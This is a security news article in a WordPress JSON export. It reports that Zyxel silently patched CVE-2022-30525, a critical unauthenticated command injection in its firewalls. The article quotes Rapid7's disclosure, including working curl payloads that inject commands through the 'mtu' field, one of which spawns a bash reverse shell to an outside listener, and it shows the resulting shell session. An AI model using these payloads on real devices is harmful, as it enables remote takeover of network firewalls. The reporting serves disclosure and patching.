{"id":46650,"date":"2022-05-13T15:43:02","date_gmt":"2022-05-13T15:43:02","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/33441\/Zyxel-Silently-Patches-Command-Injection-Vulnerability-With-9.8-Severity-Rating.html"},"modified":"2022-05-13T15:43:02","modified_gmt":"2022-05-13T15:43:02","slug":"zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/","title":{"rendered":"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating"},"content":{"rendered":"<figure class=\"intro-image intro-left\"> <img decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/05\/zyxel-atp.png\" alt=\"Zyxel silently patches command-injection vulnerability with 9.8 severity rating\"><figcaption class=\"caption\"><\/figcaption><\/figure>\n<p>Hardware manufacturer Zyxel quietly released an update fixing a critical vulnerability that gives hackers the ability to control tens of thousands of firewall devices remotely.<\/p>\n<p>The vulnerability, which allows remote command 
injection with no authentication required, carries a severity rating of 9.8 out of a possible 10. It\u2019s easy to exploit by sending simple HTTP or HTTPS requests to affected devices. The requests allow hackers to send commands or open a web shell interface that enables hackers to maintain privileged access over time.<\/p>\n<h2>High-value, easy to weaponize, requires no authentication<\/h2>\n<p>The vulnerability affects a line of firewalls that offer a feature known as zero-touch provisioning. Zyxel markets the devices for use in small branch and corporate headquarter deployments. The devices perform VPN connectivity, SSL inspection, web filtering, intrusion protection, and email security and provide up to 5Gbps throughput through the firewall. The Shodan device search service shows more than 16,000 affected devices are exposed to the Internet.<\/p>\n<figure class=\"image shortcode-img center large\"><a href=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/05\/zyxel-firewalls-shodan.png\" class=\"enlarge\" data-height=\"675\" data-width=\"980\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/05\/zyxel-firewalls-shodan-640x441.png\" width=\"640\" height=\"441\" srcset=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/05\/zyxel-firewalls-shodan.png 2x\"><\/a><figcaption class=\"caption\"><\/figcaption><\/figure>\n<p>The specific devices affected are:<\/p>\n<table>\n<thead>\n<tr>\n<th>Affected Model<\/th>\n<th>Affected Firmware Version<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>USG FLEX 100, 100W, 200, 500, 700<\/td>\n<td>ZLD5.00 thru ZLD5.21 Patch 1<\/td>\n<\/tr>\n<tr>\n<td>USG20-VPN, USG20W-VPN<\/td>\n<td>ZLD5.10 thru ZLD5.21 Patch 1<\/td>\n<\/tr>\n<tr>\n<td>ATP 100, 200, 500, 700, 800<\/td>\n<td>ZLD5.10 thru ZLD5.21 Patch 1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>The vulnerability is tracked as CVE-2022-30525. 
Rapid7, the security firm that discovered it and privately reported it to Zyxel, said that the VPN series of the devices also supports ZTP, but they\u2019re not vulnerable because they don\u2019t include other required functionality. In an <a href=\"https:\/\/www.rapid7.com\/blog\/post\/2022\/05\/12\/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection\/\">advisory published Thursday<\/a>, Rapid7 researcher Jake Baines wrote:<\/p>\n<blockquote>\n<p>The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the <code>nobody<\/code> user. This vulnerability is exploited through the <code>\/ztp\/cgi-bin\/handler<\/code> URI and is the result of passing unsanitized attacker input into the <code>os.system<\/code> method in <code>lib_wan_settings.py<\/code>. The vulnerable functionality is invoked in association with the <code>setWanPortSt<\/code> command. An attacker can inject arbitrary commands into the <code>mtu<\/code> or the <code>data<\/code> parameter.<\/p>\n<\/blockquote>\n<p>Below are examples of (1) <code>curl<\/code> that causes the firewall to execute a <code>ping<\/code>&nbsp;to IP address 192.168.1.220, followed by (2) the powershell output of the results, (3) the spawning of a reverse shell and (4) things a hacker can do with the reverse shell:<\/p>\n<ol>\n<li>\n<ol>\n<li>\n<pre><code>curl -v --insecure -X POST -H \"Content-Type: application\/json\" -d '{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\"\n:\"1\",\"vlanid\":\"5\",\"mtu\":\"; ping 192.168.1.220;\",\"data\":\"hi\"}'\nhttps:\/\/192.168.1.1\/ztp\/cgi-bin\/handler\n<\/code><\/pre>\n<\/li>\n<li>\n<pre><code>nobody 11040 0.0 0.2 21040 5152 ? 
S Apr10 0:00 \\_ \/usr\/local\/apache\/bin\/httpd -f \/usr\/local\/zyxel-gui\/httpd.conf -k graceful -DSSL\nnobody 16052 56.4 0.6 18104 11224 ? S 06:16 0:02 | \\_ \/usr\/bin\/python \/usr\/local\/zyxel-gui\/htdocs\/ztp\/cgi-bin\/handler.py\nnobody 16055 0.0 0.0 3568 1492 ? S 06:16 0:00 | \\_ sh -c \/usr\/sbin\/sdwan_iface_ipc 11 WAN3 4 ; ping 192.168.1.220; 5 &gt;\/dev\/null 2&gt;&amp;1\nnobody 16057 0.0 0.0 2152 564 ? S 06:16 0:00 | \\_ ping 192.168.1.220\n<\/code><\/pre>\n<\/li>\n<li>\n<pre><code>curl -v --insecure -X POST -H \"Content-Type: application\/json\" -d '\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\": \"1\",\"vlanid\":\"5\",\"mtu\":\"; bash -c \\\"exec bash -i &amp;&gt;\/dev\/tcp\/\n192.168.1.220\/1270 &lt;&amp;1;\\\";\",\"data\":\"hi\"}' https:\/\/192.168.1.1\n\/ztp\/cgi-bin\/handler\n<\/code><\/pre>\n<\/li>\n<li>\n<pre><code class=\"language-sh\">albinolobster@ubuntu:~$ nc -lvnp 1270\nListening on 0.0.0.0 1270\nConnection received on 192.168.1.1 37882\nbash: cannot set terminal process group (11037): Inappropriate ioctl for device\nbash: no job control in this shell\nbash-5.1$ id\nid\nuid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)\nbash-5.1$ uname -a\nuname -a\nLinux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU\/Linux\nBash-5.1\n<\/code><\/pre>\n<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p>Rapid7 has developed a module for the Metasploit exploit framework <a href=\"https:\/\/github.com\/rapid7\/metasploit-framework\/pull\/16563\">here<\/a> that automates the exploitation process.<\/p>\n<p>Baines said that Rapid7 notified Zyxel of the vulnerability on April 13 and that the two parties agreed to provide a coordinated disclosure, including the fix, on June 21. 
The researcher went on to say that unbeknownst to Rapid7, the hardware manufacturer released a firmware update on April 28 that quietly fixed the vulnerability. Zyxel only obtained the CVE number on Tuesday, after Rapid7 asked about the silent patch, and published an <a href=\"https:\/\/www.zyxel.com\/support\/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml\">advisory<\/a> on Thursday.<\/p>\n<p><a href=\"https:\/\/attackerkb.com\/topics\/LbcysnvxO2\/cve-2022-30525\/rapid7-analysis\">According to AttackerKB<\/a>, a resource on security vulnerabilities, CVE-2022-30525 is of high value to threat actors because it\u2019s easy to weaponize, requires no authentication, and can be exploited in the default setup of vulnerable devices. Rapid7 representatives weren\u2019t available to answer basic questions about the accuracy of that assessment.<\/p>\n<p>Administrators must manually apply the patch unless they have changed default settings to allow automatic updating. Early indications are that the patch hasn&#8217;t been widely deployed, as a Shodan query for just one of the vulnerable firewalls, the ATP200, showed that only about 25 percent of exposed devices were running the latest firmware.<\/p>\n<p>Vulnerabilities affecting firewalls can be especially severe because they sit at the outer edge of networks where incoming and outgoing traffic flows. Many firewalls can also read data before it\u2019s encrypted. 
Administrators who oversee networks that use these affected devices should prioritize investigating their exposure to this vulnerability and patch accordingly.<\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/33441\/Zyxel-Silently-Patches-Command-Injection-Vulnerability-With-9.8-Severity-Rating.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":46651,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[60],"tags":[1011],"class_list":["post-46650","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-packet-storm","tag-headlineflawpatch"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-05-13T15:43:02+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/05\/zyxel-atp.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity 
Rating\",\"datePublished\":\"2022-05-13T15:43:02+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/\"},\"wordCount\":610,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png\",\"keywords\":[\"headline,flaw,patch\"],\"articleSection\":[\"Packet Storm\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/\",\"name\":\"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png\",\"datePublished\":\"2022-05-13T15:43:02+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png\",\"width\":602,\"height\":246},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,flaw,patch\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlineflawpatch\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat 
Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH 
Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/","og_locale":"en_US","og_type":"article","og_title":"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-05-13T15:43:02+00:00","og_image":[{"url":"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/05\/zyxel-atp.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating","datePublished":"2022-05-13T15:43:02+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/"},"wordCount":610,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png","keywords":["headline,flaw,patch"],"articleSection":["Packet 
Storm"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/","url":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/","name":"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png","datePublished":"2022-05-13T15:43:02+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png","width":602,"height":246},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,flaw,patch","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlineflawpatch\/"},{"@type":"ListItem","position":3,"name":"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - 
Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH 
Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/46650","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=46650"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/46650\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/46651"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=46650"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=46650"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=46650"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}